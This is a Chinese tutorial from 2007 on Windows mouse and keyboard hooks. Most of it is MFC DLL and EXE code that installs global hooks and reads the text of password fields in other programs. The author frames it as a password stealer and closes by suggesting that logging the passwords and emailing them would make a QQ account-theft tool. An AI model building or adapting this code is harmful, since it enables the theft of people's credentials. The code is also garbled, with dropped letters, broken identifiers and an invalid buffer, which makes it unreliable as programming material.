利用鼠标键盘钩子截获密码
作者:未知 时间:2007-04-13
钩子是一种强大的系统编程技术,能够截获并处理系统消息,实现一般程序无法完成的功能。本文详细介绍了钩子的分类,包括WH_CALLWNDPROC、WH_CALLWNDPROCRET、WH_DEBUG、WH_FOREGROUNDIDLE、WH_JOURNALRECORD、WH_JOURNALPLAYBACK、WH_KEYBOARD、WH_KEYBOARD_LL、WH_MOUSE、WH_MOUSE_LL、WH_SHELL、WH_MSGFILTER和WH_SYSMSGFILTER等,并阐述了安装和卸载钩子的方法。通过SetWindowsHookEx函数安装钩子,定义钩子函数处理特定事件,本文以截获输入密码为例,展示了如何使用鼠标和键盘钩子。实例中,通过新建MFC DLL和EXE项目,实现钩子安装和密码截获,并提供StartHook和StopHook函数控制钩子的启动和停止。最后,本文探讨了如何将截获的密码输出到文件和发送邮件,为构建简单的密码窃取工具提供了思路。
钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的
钩子分类 :
1、WHCALLWNDPROC和WHCALLWNDPROCRET: 使你可以监视发送到窗口过程的消息
3、WH_DEBUG 调试钩子
4、WHFOREGROUNDIDLE 当当应用程序的前台线程大概要变成空闲状态时,系统就会调用 WHFOREGROUNDIDL
5、WH_JOURNALRECORD 监视和记录输入事件
6、WHJOURNALPLAYBACK 回放用WHJOURNALRECORD记录事件
7、WH_KEYBOARD 键盘钩子
9、WHKEYBOARDLL 低层键盘钩子
10、WH_MOUSE 鼠标钩子
11、WHMOUSELL 底层鼠标钩子
12、WH_SHELL 外壳钩子
13、WHMSGFILTER 和 WHSYSMSGFILTER 使我们可以监视菜单,滚动条,消息框等
安装钩子:
调用函数SetWindowsHookEx安装钩子。其函数原型为:
HHOOK SetWindowsHookEx( int idHook,HOOKPROC pfn, INSTANCE hMod,DWORD dwThreadId )
idHook表示钩子类型,它是和钩子函数类型一一对应的。如,WHKEYBOARD,WHMOUSE。
Lpfn是钩子函数的地址。
HMod是钩子函数所在的实例的句柄。对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。 (系统钩子必须在DLL中)
dwThreadId 指定钩子所监视的线程的线程号。对于全局钩子,该参数为NULL。
SetWindowsHookEx返回所安装的钩子句柄。
卸载钩子
调用函数 BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子
定义钩子函数
钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后,系统会调用钩子函数进行处理。一般为下:
LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM Param)
参数wParam和 Param包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。nCode包含有关消息本身的信,比如是否从消息队列中移出。
实例:
下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。
1,进入向导,新建MFC AppWizard(d) 取名为GetPass,选择MFC Extension DLL,完成。
2,新建一个CGetPassHook 类,基类:CObject,并加入StartHook,StopHook,函数,如下:
cass AFXEXTCLASS CGetPassHook : pubic CObject
{
pubic:
BOOL StopHook();
BOOL StartHook(HWND hwnd);
CGetPassHook();
virtua ~CGetPassHook();
};
3:加入全局共享数据,如下:
#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; fie://keyboar hook
HHOOK hMouseHook=NULL; fie://mouse hook
HINSTANCE ghInstance=NULL; fie://gobe instance
HWND hOutPutWnd=NULL; fie://Dispay Pass Wnd
#pragma data_seg()
4:加入鼠标,键盘钩子处理函数,如下:
LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM Param)
{ fie://鼠标钩子得理函数
LPMOUSEHOOKSTRUCT pMouse=(MOUSEHOOKSTRUCT FAR*)Param;
if(nCode>=0)
{
HWND hTargetHwnd=pMouse->hwnd; fie://得到鼠标所在窗口句柄
if(hTargetHwnd)
{
LONG stye=::GetWindowLong(hTargetHwnd,GWL_STYLE); fie://得到它的样式
if(stye&ES_PASSWORD) fie://如果是密码框
{
char szPass;
::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);
fie://得到密码
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);
fie://显示密码
}
}
}
return CaNextHookEx(hMouseHook,nCode,wParam,Param);
fie://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
fie://可以起到截儿消息的目的,我们这里调用之。
}
LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM Param)
{ fie://keyboard hook proc
if(nCode>=0)
{
HWND hTargetHwnd=GetActiveWindow(); fie://get active window
if(hTargetHwnd)
EnumChidWindows(hTargetHwnd,EnumWndProc,0); fie://枚举所有窗口
}
return CaNextHookEx(hKeyBoardHook,nCode,wParam,Param);
fie://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
fie://可以起到截儿消息的目的,我们这里调用之。
}
这里要介绍下EnumChidWindows函数,原形如下:
BOOL EnumChidWindows(HWND hWndParent,WINDENUMPROC pEnumFunc,LPARAM Param);
hWndParent:为枚举窗口的句柄
pEnumFunc:枚举函数的地址,
Param:这里为0
5:加入枚举窗口的函数。如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。
BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM Param)
{ fie://enum the chid window,find passedit
if(hwnd)
{
LONG stye=::GetWindowLong(hwnd,GWL_STYLE); fie://得到STYLE
if(stye&ES_PASSWORD) fie://是密码框
{
char szPass;
::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); fie://得到PASS
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); fie://显示
return TRUE;
}
}
return TRUE;
}
6:在DEF文件中定义段属性: (这步很重要)
SECTIONS
mydata READ WRITE SHARED
7:完成StartHook,StopHook函数,启动/关闭钩子,如下:
BOOL CGetPassHook::StartHook(HWND hwnd)
{ fie://insta hoook
hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,ghInstance,0);
fie://mouse hook
hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,ghInstance,0);
fie://keyboard hook
if(hMouseHook&&hKeyBoardHook)
{
hOutPutWnd=hwnd; fie://显示密码的句柄
return TRUE;
}
return FALSE;
}
BOOL CGetPassHook::StopHook()
{ fie://unsta hook
BOOL mHook=UnhookWindowsHookEx(hMouseHook);
BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);
if(mHook&&kHook)
return TRUE;
return FALSE;
}
8:在DLLMAIN函数中得到DLL句柄,要用到ghInstance变量,因此要加入一句,如下:
extern HINSTANCE ghInstance; fie://记得这里
extern "C" int APIENTRY
DMain(HINSTANCE hInstance, DWORD dwReason, LPVOID pReserved)
{
UNREFERENCED_PARAMETER(pReserved);
if (dwReason == DLLPROCESSATTACH)
{
TRACE0("GETPASS.DLL Initiaizing!n");
if (!AfxInitExtensionModue(GetPassDLL, hInstance))
return 0;
new CDynLinkLibrary(GetPassDLL);
ghInstance=hInstance; fie://得到句柄
}
ese if (dwReason == DLLPROCESSDETACH)
{
TRACE0("GETPASS.DLL Terminating!n");
AfxTermExtensionModue(GetPassDLL);
}
return 1; // ok
}
9:编译,完成DLL部分,
下面建立APP部分。如下:
1:新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区,这样方便。
2:将刚才的DLL中的GetPass.ib,和GetPassHook.h拷贝APP所在目录,然后Project->Add to Project-->Fies
选择这两个文件。
2:在主对话框中,加入一个EDIT,ID 为IDCEDITPASS
3:在CGetPassWordDg.h中包含GetPassHook.h文件,声明一个对象。如下:
#incude "GetPassHook.h"
cass CGetPassWordDg : pubic CDiaog
{
protected:
CGetPassHook m_hook;
。。
DECLAREMESSAGEMAP()
};
4:在实现文件中:OnInitDiaog()中起动HOOK
BOOL CGetPassWordDg::OnInitDiaog()
{
CWnd *pWnd=GetDgItem(IDCEDITPASS);
m_hook.StartHook(pWnd->GetSafeHwnd()); fie://insta hook
return TRUE; // return TRUE uness you set the focus to a contro
}
5:加入WM_DESTROY消息,在退出程序时停止HOOK,如下:
void CGetPassWordDg::OnDestroy()
{
CDiaog::OnDestroy();
m_hook.StopHook(); fie://stop hook
}
6:将GetPass.d拷贝到。EXE一个目录下,
7:编译,运行.
这样,你在输入任何密码框输入密码时,密码都将截获。就算键盘HOOK失效,移动鼠标到密码框,也都获取*号密码,因为我们安装两个HOOK。启动QQ,输入密码,试下看是否已经截获了密码?将本程序稍做修改,将截获的密码输出到文件,并加入发送邮件攻能,一个QQ盗号器就做成了。